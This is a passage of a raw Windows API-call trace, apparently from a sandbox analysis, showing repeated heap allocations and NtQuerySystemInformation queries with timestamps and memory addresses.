0x27fc8db0000 [0215.258] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e41ef0 [0215.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.259] GetProcessHeap () returned 0x27fc8db0000 [0215.259] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9db02f0 [0215.259] GetProcessHeap () returned 0x27fc8db0000 [0215.259] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f505c0 [0215.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.260] GetProcessHeap () returned 0x27fc8db0000 [0215.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd520 [0215.260] GetProcessHeap () returned 0x27fc8db0000 [0215.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e42e50 [0215.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.263] GetProcessHeap () returned 0x27fc8db0000 [0215.263] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd340 [0215.263] GetProcessHeap () returned 0x27fc8db0000 [0215.263] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e41830 [0215.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.264] GetProcessHeap () returned 0x27fc8db0000 [0215.264] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9db02f0 [0215.264] GetProcessHeap () returned 0x27fc8db0000 [0215.264] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f50aa0 [0215.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.264] GetProcessHeap () returned 0x27fc8db0000 [0215.264] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0215.264] GetProcessHeap () returned 0x27fc8db0000 [0215.264] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e43310 [0215.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0215.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0215.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0215.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0215.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x28, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0215.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0215.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0215.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x20, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x20, ResultLength=0x0) [0215.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0215.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0215.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0215.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0215.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0215.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0215.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.678] NtQuerySystemInformation (SystemInformationClass=0xb9, 